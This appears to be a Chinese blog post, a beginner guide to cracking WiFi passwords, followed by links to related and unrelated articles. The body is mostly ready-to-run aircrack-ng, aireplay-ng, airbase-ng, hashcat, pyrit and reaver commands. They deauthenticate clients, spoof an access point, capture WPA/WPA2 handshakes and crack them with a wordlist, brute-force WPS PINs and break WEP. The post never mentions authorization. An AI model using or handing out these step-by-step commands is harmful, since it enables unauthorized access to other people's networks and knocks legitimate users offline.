话不多说,先来看看字典破解 wpa2 的效果

===================================

===============================================
字典破解 wifi-wpa/wpa2
目前最常用的加密类型
此方法只适合破解弱口令
其他暴力破解伤CPU/GPU
===============================================
1. 安装aircrack-ng
   1. 直接使用apt-get,但有的软件仓库不是最新版
   2. 源码安装 http://www.aircrack-ng.org/
      * 现在要翻一下才能下载

2. 无线网卡开启monitor(建议另外使用usb无线网卡)
  > sudo ifconfig wlan0 down
  > sudo iwconfig wlan0 mode monitor

3. 查看无线网络,选择对象BSSID和CHN(通道),同时记下ESSID
  > sudo airodump-ng wlan0

4. 对指定对象进行dump, 并记录连接该BSSID的STATION(CLIENTID, 也就是谁连了)
  > sudo airodump-ng -w wpa2 -c CHN --bssid BSSID wlan0
  * -w 为保存的抓包文件的前缀
  * -c 为前面记录的通道

5. 创建fake AP(可以加快获取握手报文)
  > sudo airbase-ng -a BSSID --essid ESSID -c CH -Z 4 -W 1 wlan0
    * 如果是wpa  一般是  -z 2  z小写(TKIP)
    * 如果是wpa2 一般是  -Z 4  Z大写(CCMP)

6. 向该网络内广播解除认证报文
  > sudo aireplay-ng -0 0 -a BSSID -c CLIENTID --ignore-negative-one wlan0

7. 等待handshake
  > 步骤4中右上脚显示收到handshake报文
  > 使用aircrack-ng *.cap 探测是否包含handshake
  > 当包含handshake报文时停止4,5,6

以下使用三种软件破解:
aircrack-ng
------
1. 开始破解
   > aircrack-ng *.cap -w dict
   * dict为字典文件,每一行一个密码

hashcat
-------
1. 将dump文件wpa2-01.cap转换为待破解格式文件done.hccap
   > wpaclean out.cap wpa2-01.cap
   > aircrack-ng out.cap -J done

2. 开始破解
   > hashcat -m 2500 done.hccap dict

pyrit
-------
1. 开始破解
   > pyrit -r wpa2-01.cap -i dict attack_passthrough

===========================================
通过PIN破解wifi
此方法需要wifi开启wps功能,且信号尽量好
目前大部分厂家的无线路由器默认是关闭wps的
同时也具有防PIN的功能
所以现在此方法用得不多了
===========================================

1. 网卡配置参考wpa/wpa2破解

2. 查看开启WPS的无线网络,选择对象BSSID
  > sudo airodump-ng --wps wlan0

3. 开始破解
  > sudo reaver -i wlan0 -b BSSID -vv
  * 根据实际环境可以改变pin的间隔时间

4. 漫长的等待

============================================
WEP加密方式破解
如果有WEP加密的wifi基本都可以很快破解
但是很不幸,这种加密方式已很难见到
但是还是学习下
============================================
1. 网卡配置参考wpa/wpa2破解

2. 查看无线无线网络,找到加密方式为WEP的wifi, 记录对象BSSID
  > sudo airodump-ng wlan0

3. 对指定对象进行dump
  > sudo airodump-ng -w wep -c 10 --bssid BSSID wlan0

4. 向对象发送请求以获取更多的报文
  > sudo aireplay-ng -1 0 -a BSSID wlan0
  * 此步骤可选择攻击方式很多,可以自行man一下

5. 读取网络中的报文(读取上万后即可停止)
  > sudo aireplay-ng -3 -b BSSID wlan0

6. 进行破解,利用当前目录下的.cap文件
  > aircrack-ng wep-01.cap

7. 如果第6步破解失败,则重复5-6

[WIFI] WIFI 破解(初级)的更多相关文章

  1. WiFi密码破解CDlinux

    好了,先说下提前要准备的东东吧:1.U盘一枚,最小1G空间.需进行格式化操作,提前保存内部文件.2.CDlinux镜像.帖子最后会提供一枚8月最新修改版,共135M. 1.CDlinux U盘启动  ...

  2. 【WiFi密码破解详细图文教程】ZOL仅此一份 详细介绍从CDlinux U盘启动到设置扫描破解-破解软件论坛-ZOL中关村在线

    body { font-family: Microsoft YaHei UI,"Microsoft YaHei", Georgia,Helvetica,Arial,sans-ser ...

  3. WiFi密码破解详细图文教程

    每天都能看到有不少网友在回复论坛之前发布的一篇破解WiFi密码的帖子,并伴随各种疑问.今天流云就为大家准备一篇实战型的文章吧,详细图文从思维CDlinux U盘启动到中文设置,如何进行路由SSID扫描 ...

  4. Wifi密码破解

    Wifi密码破解1:通过字典(暴力)破解WIFI密码   简单破解WEP/WPA/WPA2加密的WIFI密码,平台kali-linux 工具:Aircrack-ng 过程很简单:先抓含有正确密码的握手 ...

  5. aircrack-ng wifi密码破解

    wifi密码破解 步骤1:查看网卡信息 ifconfig 找到你要用到的网卡 步骤2:启动网卡监听模式 airmon-ng start wlan0 我的是wlp2s0 步骤三:查看网卡变化 wlan0 ...

  6. Kali对wifi的破解记录

    好记性不如烂笔头,记录一下. 我是在淘宝买的拓实N87,Kali可以识别,还行. 操作系统:Kali 开始吧. 查看一下网卡的接口.命令如下 airmon-ng 可以看出接口名称是wlan0mon. ...

  7. 15款免费WiFi入侵破解安全测试工具

    以下是的15款免费(接近免费)的WiFi网络入侵测试工具.这些工具将帮你发现流氓AP,弱Wi-Fi密码等安全隐患,在黑客光临之前把漏洞补上. 一.Vistumbler扫描器 Kismet是一个开源的W ...

  8. CDLinux环境下WiFi密码破解

    > 准备好所需软件以及上篇教程中使用Fbinstool制作的可启动U盘 2 > 解压CDLinux-0.9-spring-0412.iso到U盘的根目录  如图 3 > 打开fbin ...

  9. wifi密码破解方法总结(含破解软件下载链接)

    眼下网上流行有非常多无线password的破解方法,总结起来最有用的还是这两种:第一种是Wirelessnetview+WinAirCrackPack软件组合,这个方法简单方便:另外一种就是大家熟悉的 ...

随机推荐

  1. d3js网络拓扑关系特效可视化展现

    d3js拓扑关系特效可视化展现 在上一篇d3js文档http://www.cnblogs.com/juandx/p/3959900.html中讲了简单的d3js方法和效果,现在我做一个完整的演示,使用 ...

  2. Nginx之虚拟目录-root与alias的区别

    最近在nginx上部署日志分析工具awstats时,在配置awstats分析结果可供网页浏览这步时,分析结果页面访问总是404.后来查阅了一些资料,发现是root和alias的用法区别没搞懂导致的,这 ...

  3. 关于Unity中UI中的Mask组件、Text组件和布局

    一.Mask组件 遮罩,Rect Mask矩形Mask(Rect Mask2D组件),图片Mask(Mask组件)(图片Mask的透明度不为0的部分显示子图片,为0的部分不显示子图片) Rect Ma ...

  4. 【转】MFC CreateFont 用法

    中国人自古就有自右至左.从上到下书写汉字的习惯.而当我们在自己所编写的应用程序中使用输出函数输出的总是自左至右的横排文字.有没有可能在我们的应用程序中实现竖写汉字的效果呢?笔者偶然发现了一种利用VC实 ...

  5. C++类的成员函数的形参列表后面的const

    看到(C++ Primer)类的成员函数这里,突然对成员函数形参列表后面的const感到迷惑. 因为书中开始说是修饰隐含形参this的,然后又说是声明该函数是只读的. 大为不解! 翻资料.找人讨论.. ...

  6. 初识EseNt

    转自:http://www.cnblogs.com/goosao/archive/2011/09/23/2186412.html 一.什么是EseNtEseNt(Extensible Storage ...

  7. (转)一种开源的跨平台视频开发框架:VideoLAN - VLC media player

    VLC原先是几个法国的大学生做的项目,后来他们把VLC作为了一个开源的项目,吸引了来自世界各国的很多优秀程序员来共同编写和维护VLC,才逐渐变成了现在这个样子.至于为什么叫VideoLan Clien ...

  8. javascript -- 将数组转换为字符串:join()

    join(separator) 方法用于把数组中的所有元素放入一个字符串.元素是通过指定的分隔符进行分隔的. separator:可选,指定要使用的分隔符.如果省略该参数,则默认使用逗号作为分隔符 v ...

  9. Storm On YARN带来的优点

    1)弹性计算资源     将storm执行在yarn上后,Storm能够与其它计算框架(如mapreduce)共享整个集群的资源.这样当Storm负载骤增时,可动态为它添加计算资源. 负载减小时,能够 ...

  10. 初次使用ets

    一.new(Name, Options) -> tid() | atom(),创建ets表. Options = [Option], 目测常用的属性, {keypos, Pos}:指定key的位 ...